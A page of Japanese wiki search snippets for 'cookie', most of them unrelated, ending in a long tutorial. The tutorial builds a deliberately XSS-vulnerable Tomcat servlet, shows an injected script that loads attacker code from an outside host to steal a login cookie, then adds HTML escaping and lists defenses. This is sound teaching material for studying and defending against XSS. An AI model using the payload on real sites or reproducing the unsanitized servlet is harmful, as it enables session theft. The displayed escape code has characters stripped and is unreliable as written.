約 5,373,913 件
https://w.atwiki.jp/bz666/pages/84.html
MARS 孤独のRunaway Mars Loving All Night ~Octopus Style~ Love Chain ~Godzilla Style~ LADY NAVIGATION ~Cookie Car Stereo Style~
https://w.atwiki.jp/mbdays/pages/14.html
MacBook 現在利用しているMacBookについて
https://w.atwiki.jp/minion/pages/29.html
青キャラが来た後、PKがきた時などに記録。 青キャラ名 赤キャラ名 ギルド Darth Vader cookie monster DL! nanami 119 ken 119 POISON 119 Risyuu Yooooi don DL! aquamarine DL! 便乗青 青キャラ名 ギルド T O M O E Alea Jacta Est Lady MinadukiSuzune Goya CoM
https://w.atwiki.jp/libjo/pages/22.html
実習室のパソンコ ブラウザ Firefox 2 Firefox 3 Opera(約一名) ブラウザの設定 Cookieを使用 Javascriptを使用 画面解像度 XGA (1024*768)画面サイズは1000*?を基準にする 職員室のパソンコ 詳細不明
https://w.atwiki.jp/eaglercraft/pages/23.html
MODリスト このページでは、EaglerForge/1.12で使用可能なMODをリスト化した一覧です。 MOD同士の干渉で、クラッシュスル可能性があります cookieを削除することで、治る場合が多いです。 名前 制作者 配布リンク 機能 備考 EaglerMobile FlamedDogo99 当wikiのgithub スマホ操作に対応 あれ
https://w.atwiki.jp/nybbas/pages/45.html
ニバス鯖仕様 2009/6/19 アイコン数 126+α データ移行 禁止 Cookie保持期間 49日 放置交代期間 360分 削除期限 無し 最大登録人数 300人 最大同時戦闘人数 300人 HP回復 1+0.1%/秒 MP回復 1/秒 RISK回復 0.2/秒 要塞回復 30/秒 建国費 10000goth 部隊結成費 30000goth 最大国数 10国
https://w.atwiki.jp/mensgc/pages/19.html
目次 マーガレットコミックス クイーンズコミックス りぼんマスコットコミックス りぼんマスコットコミックスCookie ぶーけコミックス YOUコミックス コメント マーガレットコミックス 作者名 作品名 巻数 池田理代子 『ベルサイユのバラ』 全10巻/文庫版全5巻/完全版全9巻 神尾葉子 『花より男子』 全36巻/完全版全20巻 河原和音 『高校デビュー』 全13巻 椎名軽穂 『君に届け』 1~9巻(以下続刊) 多田かおる 『イタズラなKiss』 全23巻/文庫版全14巻 桃森ミヨシ 『ハツカレ』 全10巻 中原アヤ 『ラブ★コン』 全17巻 クイーンズコミックス 作者名 作品名 巻数 羽海野チカ 『ハチミツとクローバー』 全10巻 りぼんマスコットコミックス 作者名 作品名 巻数 小花美穂 『こどものおもちゃ』 全10巻/完全版全7巻/文庫版1~6巻 太刀掛秀子 『花ぶらんこゆれて・・・』 全4巻/文庫版全2巻 津山ちなみ 『HIGH SCORE』 1~5巻(以下続刊) 萩岩睦美 『銀曜日のおとぎばなし』 全6巻/文庫版全3巻 柊あおい 『星の瞳のシルエット』 全10巻/文庫版全6巻 柊あおい 『銀色のハーモニー』 全7巻/文庫版全4巻 槙ようこ 『愛してるぜベイベ★★』 全7巻 水沢めぐみ 『姫ちゃんのリボン』 全10巻/文庫版全7巻 矢沢あい 『天使なんかじゃない』 全8巻/完全版 一条ゆかり 『有閑倶楽部』 1~19巻(以下続刊)/文庫版1~10巻 岡田あーみん 『お父さんは心配性』 全6巻/文庫版全4巻 岡田あーみん 『こいつら100%伝説』 全3巻 りぼんマスコットコミックスCookie 作者名 作品名 巻数 矢沢あい 『NANA』 1~17巻(以下続刊) ぶーけコミックス 作者名 作品名 巻数 逢坂みえこ 『永遠の野原』 全16巻/文庫版全9巻 松苗あけみ 『純情クレイジーフルーツ』 前編・後編+続編全9巻/文庫版全1巻+続編全5巻 水樹和佳子 『イティハーサ』 全12巻/文庫版全7巻 水樹和佳子 『樹魔・伝説』 全1巻/文庫版全1巻 YOUコミックス 作者名 作品名 巻数 森本梢子 『研修医なな子』 全7巻/文庫版全4巻 コメント Name
https://w.atwiki.jp/shiren_festival/pages/23.html
順位 お名前 タイム 1 ちくやん 13 22 2 セガナイケ 14 01 3 ぱんちどらんか~ 17 06 4 プロナ 18 00 5 イリィ 19 54 6 ガーネット 20 11 7 紅切サツキ 20 28 8 HAKUA(白鴉) 23 22 9 りん☆cookie 30 35 DNF アジフライ帝国からの使者 25F
https://w.atwiki.jp/ameba_pigg/pages/2067.html
お菓子なクッキーパターン柄の壁 whiteday_wall_cookie_pattern_1003.swf 2010ホワイトデー 通販 パソコン 期間限定 男女共通 インテリア 床・窓・壁 350アメG http //ameblo.jp/pigg-staff/entry-10476575800.html
https://w.atwiki.jp/chapati4it/pages/504.html
Tomcatでクロスサイトスクリプティングの脆弱性があるアプリを作成して、クロスサイトスクリプティングを体験、それからクロスサイトスクリプティング対策を実施するサンプルです。 ■目次 まずは脆弱性のあるサンプルソース サンプルの説明 ダメなところ クロスサイトスクリプティングをやってみよう1 クロスサイトスクリプティングをやってみよう2 クロスサイトスクリプティング対策をしてみよう その他のクロスサイトスクリプティング対策 まずは脆弱性のあるサンプルソース xss.jsp %@ page language="java" contentType="text/html; charset=UTF8" pageEncoding="UTF-8" % html head title Xssサンプル /title meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /head body 名前: %= request.getAttribute("name") % br 内容: %= request.getAttribute("content") % hr form action= %=request.getContextPath()+"/xss"% method= GET お名前: input type="text" name="name" value= br 内容: textarea name="content" /textarea br /form /body /html Xss.java import java.io.*; import javax.servlet.*; import javax.servlet.http.*; public class Xss extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // JSPに渡すパラメータ req.setAttribute("name", ""); req.setAttribute("content", ""); // クッキー設定 resp.addCookie(new Cookie("userid", "hogehoge")); resp.addCookie(new Cookie("xss", "sample")); RequestDispatcher disp = req.getRequestDispatcher("/jsp/xss.jsp"); disp.forward(req, resp); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // パラメータを処理 req.setCharacterEncoding("UTF-8"); String name = req.getParameter("name"); if (name == null) name = ""; String content = req.getParameter("content"); if (content == null) content = ""; content = content.replaceAll("\n", " br "); // JSPに渡す req.setAttribute("name", name); req.setAttribute("content", content); RequestDispatcher disp = req.getRequestDispatcher("/jsp/xss.jsp"); disp.forward(req, resp); } } web.xml ?xml version="1.0" encoding="ISO-8859-1"? web-app xmlns="http //java.sun.com/xml/ns/javaee" xmlns xsi="http //www.w3.org/2001/XMLSchema-instance" xsi schemaLocation="http //java.sun.com/xml/ns/javaee http //java.sun.com/xml/ns/javaee/web-app_3_0.xsd" version="3.0" servlet servlet-name xss /servlet-name servlet-class Xss /servlet-class /servlet servlet-mapping servlet-name xss /servlet-name url-pattern /xss /url-pattern /servlet-mapping /web-app サンプルの説明 なんの変哲もない、画面からの入力をまた画面に表示する「掲示板もどき」なサンプルです。 /xxx にアクセス(GET)するとクッキーに userid を設定します。クッキーに userid が残っていればログイン中という判断 userid のルールはアルファベットの大文字小文字と 0 から 9 の数字とする。 名前と内容を入力して送信(POST)すると名前と内容をJSPに表示します。 このサンプルを普通に使うと以下のようになります。 ※submitボタンを省略しているので、名前のテキストボックスでエンターを押すとフォームの内容が送信されます。 Before ↓ After ダメなところ このサンプルの良くないところは、以下のパラメータを処理してJSPに渡す部分です。 // パラメータを処理 req.setCharacterEncoding("UTF-8"); String name = req.getParameter("name"); if (name == null) name = ""; String content = req.getParameter("content"); if (content == null) content = ""; content = content.replaceAll("\n", " br "); // JSPに渡す req.setAttribute("name", name); req.setAttribute("content", content); 教科書的に言えば、ここでパラメータの文字列から「 」「 」「 」「"」「 」の5種類をサニタイジングする必要があります。 ですが、今回のサンプルはまず脆弱性の体験が目的なのでサニタイジングは省略しています。 ※厳密に言うと、クッキーに保存した userid でログインしていると判断するのも危険ですが今回は無視してください。 クロスサイトスクリプティングをやってみよう1 まずは以下のように内容に「 script alert(document.cookie) /script 」と入力してみましょう。このスクリプトは、クッキーの内容をダイアログに表示するスクリプトです。 ↓ はい、サニタイジングしてないので見事にスクリプトが動作してクッキーの内容が表示されました。 ※クッキーはローカルに保存されるので、このようなスクリプトを使わなくても確認できます。 内容から、 userid がログインに使うIDだとわかるので、これを盗むスクリプトを動作させてみましょう。 クロスサイトスクリプティングをやってみよう2 次は以下のスクリプトを打ち込んでフォームを送信しましょう。 script var tag = document.createElement("script");tag.setAttribute("src","http //www46.atpages.jp/chapati/xss/sample1.js");document.getElementsByTagName("body").item(0).appendChild(tag); /script 以下のようなダイアログが表示されればXSS攻撃成功です。 上記のスクリプトは、攻撃者が用意したスクリプト「http //www46.atpages.jp/chapati/xss/sample1.js」を実行させるものです。 http //www46.atpages.jp/chapati/xss/sample1.jsの中身は以下のようになっています。 // クッキーからログインIDを抜き出す var userid = document.cookie.match(/userid=[a-zA-Z0-9]+/).toString().substring(7); // 攻撃サイトのURLにログインIDを追加し攻撃URLを作成 var url = "http //www46.atpages.jp/chapati/xss/" + userid; // スクリプトタグを作成 var tag = document.createElement("script"); // src属性に攻撃URLを設定 tag.setAttribute("src",url); // bodyタグにスクリプトタグを追加 document.getElementsByTagName("body").item(0).appendChild(tag); このスクリプトは、コメントにもあるとおり、クッキーからログインIDを抜き出し、ログインIDをURLに追加して攻撃者の用意したサイトにアクセスさせます。 今回のサンプルでは、ログインIDは「hogehoge」なので、「http //www46.atpages.jp/chapati/xss/hogehoge」にアクセスが発生すれば、攻撃者はURLからログインIDを取得できてしまいます。 ※今回は「XSS攻撃成功!」と表示するスクリプトを埋め込んでいますが、実際に攻撃されたときはそんなダイアログはでません。 クロスサイトスクリプティングの脆弱性があると、悪意のある javascript をいとも簡単に実行できることがお分かりいただけたでしょうか? 今回はクッキーの情報を盗むスクリプトですが、javsscriptを自由に実行されるとHTMLの中に書いてある情報全てを好きなだけ盗むことが可能になります。利用者の個人情報が表示されたページに、悪意のあるスクリプトを埋め込まれれば、もちろん個人情報だって盗めてしまうのです。 クロスサイトスクリプティング対策をしてみよう 今回のサンプルの脆弱性は、入力された文字をサニタイジングしないで表示していることです。ですから、サニタイジングを実施すればクロスサイトスクリプティング攻撃は成功しなくなります。 以下のソースコードが、サニタイジングを実施したサンプルです。 Xss.java(対策後) import java.io.*; import javax.servlet.*; import javax.servlet.http.*; public class Xss extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // JSPに渡すパラメータ req.setAttribute("name", ""); req.setAttribute("content", ""); // クッキー設定 resp.addCookie(new Cookie("userid", "hogehoge")); resp.addCookie(new Cookie("xss", "sample")); RequestDispatcher disp = req.getRequestDispatcher("/jsp/xss.jsp"); disp.forward(req, resp); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // パラメータを処理 req.setCharacterEncoding("UTF-8"); String name = req.getParameter("name"); // if (name == null) name = ""; name = escapeHTML(name);// ★★★ 修正点 ★★★ String content = req.getParameter("content"); // if (content == null) content = ""; content = escapeHTML(content);// ★★★ 修正点 ★★★ content = content.replaceAll("\n", " br "); // JSPに渡す req.setAttribute("name", name); req.setAttribute("content", content); RequestDispatcher disp = req.getRequestDispatcher("/jsp/xss.jsp"); disp.forward(req, resp); } //★★★ 修正点 ★★★ public static String escapeHTML(String val) { if (val == null) return ""; val = val.replaceAll(" ", " amp;"); val = val.replaceAll(" ", " lt;"); val = val.replaceAll(" ", " gt;"); val = val.replaceAll("\"", " quot;"); val = val.replaceAll(" ", " apos;"); return val; } } 修正点は「 」「 」「 」「"」「 」をそれぞれ「 lt;」「 gt;」「 amp;」「"」「'」に変換する関数「escapeHTML」を追加したのと、「name」「content」パラメータを escapeHTML でサニタイジングしていることです。※wikiの表示の都合で の後に半角スペース入れています。 この修正を加えたサンプルで、再びスクリプトを入力してみると以下のような画面になります。 スクリプトが実行されず、そのまま画面に表示されていれば、クロスサイトスクリプティング対策成功です。 その他のクロスサイトスクリプティング対策 クロスサイトスクリプティングの対策には、大雑把に以下の様なものがあります。今回対策したのは、この中の「ウェブページに出力する全ての要素に対して、エスケープ処理を施す。」に過ぎません。他の対策については折をみて記事を追加していこうと思います。 HTMLテキストの入力を許可しない場合の対策ウェブページに出力する全ての要素に対して、エスケープ処理を施す。 URLを出力するときは、「http //」や「https //」で始まるURLのみを許可する。 script ... /script 要素の内容を動的に生成しない。 スタイルシートを任意のサイトから取り込めるようにしない。 入力値の内容チェックを行う。 HTMLテキストの入力を許可する場合の対策入力されたHTMLテキストから構文解析木を作成し、スクリプトを含まない必要な要素のみを抽出する。 入力されたHTMLテキストから、スクリプトに該当する文字列を排除する。 全てのウェブアプリケーションに共通の対策HTTPレスポンスヘッダのContent-Typeフィールドに文字コード(charset)を指定する。 Cookie情報の漏えい対策として、発行するCookieにHttpOnly属性を加え、TRACEメソッドを無効化する。 ※参考 IPA 安全なウェブサイトの作り方(PDF)